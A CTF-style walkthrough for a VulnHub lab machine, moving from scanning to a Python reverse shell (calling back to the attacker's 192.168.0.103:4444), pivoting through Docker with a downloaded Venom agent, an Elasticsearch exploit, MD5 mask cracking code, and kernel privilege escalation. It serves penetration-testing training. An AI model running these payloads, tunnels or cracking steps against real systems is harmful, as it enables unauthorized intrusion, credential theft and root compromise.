Target machine info
https://www.vulnhub.com/entry/boredhackerblog-social-network,454/
Host, port and service discovery
- Host discovery: arp-scan -l
- or: nmap -sP 192.168.0.1/24 (-sP is the old spelling of -sn, a ping sweep without port scanning)
- Port discovery: nmap -p- 192.168.0.102
- Service discovery: nmap -p22,5000 -sV 192.168.0.102
Port 5000 on the target is served by Werkzeug (the Python WSGI toolkit that Flask runs on), which already hints that the application is written in Python.
Target website penetration
- Open http://192.168.0.102:5000 in a browser.
- Run a directory brute-force scan first; it reveals an /admin directory.
- http://192.168.0.102:5000/admin exposes a code-execution function. The target stack is Python, so the executed code is most likely Python, which means a Python reverse shell is needed.
- Start a listener on Kali: nc -nvlp 4444
- Submit the reverse shell payload and get a shell. The address in the payload is the attacker's (Kali) IP, 192.168.0.103, where nc is listening, not the target's own address:
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.103",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
Determine whether the target server is a Docker container
The shell prompt is /app # and the host sits in 172.17.0.0/16, Docker's default bridge subnet, which suggests the shell landed inside a container rather than on the VM itself.
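The page does not show which checks it used to decide the shell was in a container. The following is an added example, not code from the original walkthrough, of the usual artifacts a practitioner looks at from a low-privilege shell: the /.dockerenv file, a container runtime name in PID 1's cgroup path, and an overlayfs root mount. The cgroup and mountinfo samples at the top are constructed, not captured from this target; the functions also read the live /proc files when run as a script.

```python
import os
import re

# Paths consulted on a live Linux system. The parsing functions take text and
# booleans so the same logic can be exercised on constructed samples.
DOCKERENV = "/.dockerenv"
CGROUP_FILE = "/proc/1/cgroup"
MOUNTINFO_FILE = "/proc/self/mountinfo"

# cgroup v1 paths name the runtime, e.g. /docker/<id>. cgroup v2 often shows
# only "0::/" inside a container, so no match here is not proof of a host.
RUNTIME_PATTERN = re.compile(r"/(docker|containerd|kubepods|lxc)[/-]")

# Constructed samples (assumed shapes, not captured from the target machine).
SAMPLE_CONTAINER_CGROUP = (
    "12:pids:/docker/4f3c1b2a9e7d8c6b5a4f3e2d1c0b9a8f7e6d5c4b3a2f1e0d9c8b7a6f5e4d3c2b\n"
    "11:memory:/docker/4f3c1b2a9e7d8c6b5a4f3e2d1c0b9a8f7e6d5c4b3a2f1e0d9c8b7a6f5e4d3c2b\n"
)
SAMPLE_CONTAINER_MOUNTINFO = (
    "27 0 0:25 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/l1,"
    "upperdir=/var/lib/docker/u,workdir=/var/lib/docker/w\n"
    "28 27 0:26 / /proc rw,nosuid - proc proc rw\n"
)
SAMPLE_HOST_CGROUP = "12:pids:/\n11:memory:/\n"
SAMPLE_HOST_MOUNTINFO = (
    "26 1 8:1 / / rw,relatime - ext4 /dev/sda1 rw,data=ordered\n"
    "27 26 0:5 / /proc rw,nosuid - proc proc rw\n"
)


def read_text(path):
    """Return the file's text, or '' if it is missing or unreadable."""
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        return ""


def root_is_overlay(mountinfo_text):
    """True if the filesystem mounted at / is overlayfs (Docker's usual storage driver)."""
    for line in mountinfo_text.splitlines():
        fields = line.split()
        # mountinfo fields: id parent major:minor root mount_point options ... - fstype source opts
        if len(fields) > 4 and fields[4] == "/" and " - overlay " in line:
            return True
    return False


def container_indicators(dockerenv_exists, cgroup_text, mountinfo_text):
    """Collect the three indicators as a dict of name -> bool."""
    return {
        "dockerenv": bool(dockerenv_exists),
        "cgroup_runtime": bool(RUNTIME_PATTERN.search(cgroup_text)),
        "overlay_root": root_is_overlay(mountinfo_text),
    }


def verdict(indicators):
    """Turn the indicator set into a short conclusion."""
    if indicators["dockerenv"] or indicators["cgroup_runtime"]:
        return "container"
    if indicators["overlay_root"]:
        return "probably container"
    return "no container markers"


def check_live():
    """Run the checks against the system the script is executing on."""
    return container_indicators(
        os.path.exists(DOCKERENV), read_text(CGROUP_FILE), read_text(MOUNTINFO_FILE)
    )


if __name__ == "__main__":
    live = check_live()
    print(live, "->", verdict(live))
```

Drop this script onto the container the same way the Venom agent is delivered later (wget from the Kali http.server) and run it with the container's python; a "no container markers" result on a cgroup v2 host still deserves a look at ip addr and the hostname, since the 172.17.0.x address is itself a strong hint.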
Internal network scan
The container has no nmap, so sweep the bridge subnet with a ping loop from the shell:
/app # for i in $(seq 1 10); do ping -c 1 172.17.0.$i; done
PING 172.17.0.1 (172.17.0.1): 56 data bytes
64 bytes from 172.17.0.1: seq=0 ttl=64 time=0.036 ms
--- 172.17.0.1 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.036/0.036/0.036 ms
PING 172.17.0.2 (172.17.0.2): 56 data bytes
64 bytes from 172.17.0.2: seq=0 ttl=64 time=0.041 ms
--- 172.17.0.2 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.041/0.041/0.041 ms
PING 172.17.0.3 (172.17.0.3): 56 data bytes
64 bytes from 172.17.0.3: seq=0 ttl=64 time=0.124 ms
--- 172.17.0.3 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.124/0.124/0.124 ms
PING 172.17.0.4 (172.17.0.4): 56 data bytes
Internal network penetration
- Basic idea: use a proxy tool to build a tunnel between Kali and the compromised internal host, so that the tools on Kali can reach the internal network through that tunnel.
- Venom basic steps:
- Copy the agent to the target host: on Kali, serve it with python3 -m http.server 80;
- On the internal host, download the agent with wget http://192.168.0.103/a and make it executable: chmod +x a
- Start the Venom admin node on Kali: ./admin_linux_x64 -lport 9999
- Start the Venom agent on the target: ./a -rhost 192.168.0.103 -rport 9999
- Venom session:
┌──(kali㉿kali)-[~/Desktop/tmp/Venom v1.1.0]
└─$ ./admin_linux_x64 -lport 9999
Venom Admin Node Start...
____ ____ { v1.1 author: Dlive }
\ \ / /____ ____ ____ _____
\ Y // __ \ / \ / \ / \
\ /\ ___/| | ( <_> ) Y Y \
\___/ \___ >___| /\____/|__|_| /
\/ \/ \/
(admin node) >>>
[+]Remote connection: 192.168.0.101:55035
[+]A new node connect to admin node success
(admin node) >>> show
A
+ -- 1
(admin node) >>> goto 1
node 1
(node 1) >>> socks 1080
a socks5 proxy of the target node has started up on the local port 1080.
(node 1) >>>
Configure proxychains to use the SOCKS5 port Venom opened:
sudo vi /etc/proxychains4.conf
socks5 127.0.0.1 1080
Scan the internal addresses with nmap through the proxy. Only full TCP connect scans (-sT) traverse a SOCKS proxy, and ICMP host discovery cannot, so add -Pn:
proxychains4 nmap -Pn -sT 172.17.0.1
proxychains4 nmap -Pn -sT -p22,5000 -sV 172.17.0.1
172.17.0.1 shows the same ports as 192.168.0.102: it is the Docker host's address on the bridge. Scan the other hosts:
proxychains4 nmap -Pn -sT -p9200 -sV 172.17.0.2
Port 9200 is open and running Elasticsearch. Use an Elasticsearch exploit script to get a shell on 172.17.0.2:
┌──(kali㉿kali)-[~]
└─$ searchsploit Elasticsearch
----------------------- ---------------------------------
Exploit Title | Path
----------------------- ---------------------------------
ElasticSearch - Remote | linux/remote/36337.py
ElasticSearch - Remote | multiple/webapps/33370.html
ElasticSearch - Search | java/remote/36415.rb
ElasticSearch 1.6.0 - | linux/webapps/38383.py
ElasticSearch < 1.4.5 | php/webapps/37054.py
ElasticSearch Dynamic | java/remote/33588.rb
----------------------- ---------------------------------
Shellcodes: No Results
cp /usr/share/exploitdb/exploits/linux/remote/36337.py .   (the searchsploit listing shows 36337.py under linux/remote, not php/webapps)
proxychains4 python 36337.py 172.17.0.2
- Looking around the filesystem on 172.17.0.2 turns up a passwords file:
Format: number,number,number,number,lowercase,lowercase,lowercase,lowercase
Example: 1234abcd
john:3f8184a7343664553fcb5337a3138814   (cracked: 1337hack)
test:861f194e9d6118f3d942a72be3e51749
admin:670c3bbc209a18dde5446e5e6c1f1d5b
root:b3d34352fc26117979deabdf1b9b6354
jane:5c158b60ed97c723b673529b8a3cf72b
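The hashes are unsalted MD5 and the file itself states the password format, four digits followed by four lowercase letters, which is the hashcat mask ?d?d?d?d?l?l?l?l. The following is an added example, not code from the original walkthrough, that parses the file, computes the size of that keyspace, and runs the same mask search in Python; the hashes are the ones listed above, the "demo" hash and the 4-character mask used for the Python run are constructed.

```python
import hashlib
import itertools
import string

# Mask character classes in hashcat notation. The passwords file says
# "number x4, lowercase x4", i.e. the mask ?d?d?d?d?l?l?l?l.
CHARSETS = {"d": string.digits, "l": string.ascii_lowercase}
FORMAT_MASK = "?d?d?d?d?l?l?l?l"

# The user:hash lines from the passwords file on 172.17.0.2 (unsalted MD5).
PASSWORDS_FILE = """\
john:3f8184a7343664553fcb5337a3138814
test:861f194e9d6118f3d942a72be3e51749
admin:670c3bbc209a18dde5446e5e6c1f1d5b
root:b3d34352fc26117979deabdf1b9b6354
jane:5c158b60ed97c723b673529b8a3cf72b
"""


def md5_hex(candidate):
    return hashlib.md5(candidate.encode()).hexdigest()


def parse_passwords_file(text):
    """'user:hash' lines -> {user: hash}; blank and malformed lines are skipped."""
    users = {}
    for line in text.splitlines():
        if ":" in line:
            user, digest = line.split(":", 1)
            users[user.strip()] = digest.strip().lower()
    return users


def parse_mask(mask):
    """'?d?d?l' -> one charset per position."""
    if len(mask) % 2 or any(mask[i] != "?" for i in range(0, len(mask), 2)):
        raise ValueError("mask must be a sequence of ?x tokens")
    return [CHARSETS[mask[i + 1]] for i in range(0, len(mask), 2)]


def keyspace(mask):
    """Number of candidates the mask generates."""
    n = 1
    for charset in parse_mask(mask):
        n *= len(charset)
    return n


def crack(hashes, mask):
    """Try every candidate in the mask against {user: md5hex}.

    Returns {user: plaintext} for the hashes recovered and stops as soon as
    every hash has been matched (several users may share one hash).
    """
    wanted = {}
    for user, digest in hashes.items():
        wanted.setdefault(digest, []).append(user)
    found = {}
    for chars in itertools.product(*parse_mask(mask)):
        candidate = "".join(chars)
        digest = md5_hex(candidate)
        if digest in wanted:
            for user in wanted.pop(digest):
                found[user] = candidate
            if not wanted:
                break
    return found


def verify(candidate, digest):
    """Check one plaintext against one hash, e.g. a value cracked elsewhere."""
    return md5_hex(candidate) == digest.lower()


if __name__ == "__main__":
    hashes = parse_passwords_file(PASSWORDS_FILE)
    print(f"keyspace for {FORMAT_MASK}: {keyspace(FORMAT_MASK):,} candidates")
    # The real mask is ~4.6e9 candidates: seconds to minutes in hashcat, hours in
    # pure Python, so the Python search is shown on a constructed 4-character demo.
    demo = {"demo": md5_hex("12ab")}
    print("demo crack:", crack(demo, "?d?d?l?l"))
    print("john == 1337hack:", verify("1337hack", hashes["john"]))
```

For the full 4.57-billion-candidate space use hashcat's mask attack rather than this loop: hashcat -m 0 -a 3 --username passwords.txt ?d?d?d?d?l?l?l?l (-m 0 is MD5, -a 3 is mask mode, --username accepts the user:hash layout). The Python version is there to show what that mask actually enumerates and to confirm a cracked value against the file.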
- Log in to 192.168.0.102 over SSH (port 22) as john with the cracked password. john is an ordinary user, not root, so look at kernel privilege escalation.
Kernel privilege escalation
- Check the kernel version:
uname -a
Linux socnet 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
- Search for Linux 3.13 kernel exploits: searchsploit 3.13
- Look at the exploit 37292.c (the overlayfs local privilege escalation for Ubuntu 3.13 to 3.19 kernels). It shells out to gcc on the target to build ofs-lib.so at run time, which fails when the target has no compiler. Delete the gcc-related code and instead build ofs-lib.so on Kali, keeping it in the same directory as the exploit binary.
- Compile the modified exploit on Kali.
- Upload the compiled exploit and ofs-lib.so to the target with wget (serving them from Kali with python3 -m http.server as before), run the exploit, and get root.
Summary of techniques:
- Host, port and service scanning
- Web directory scanning
- Python reverse shell
- Internal network scanning and pivoting
- Kernel privilege escalation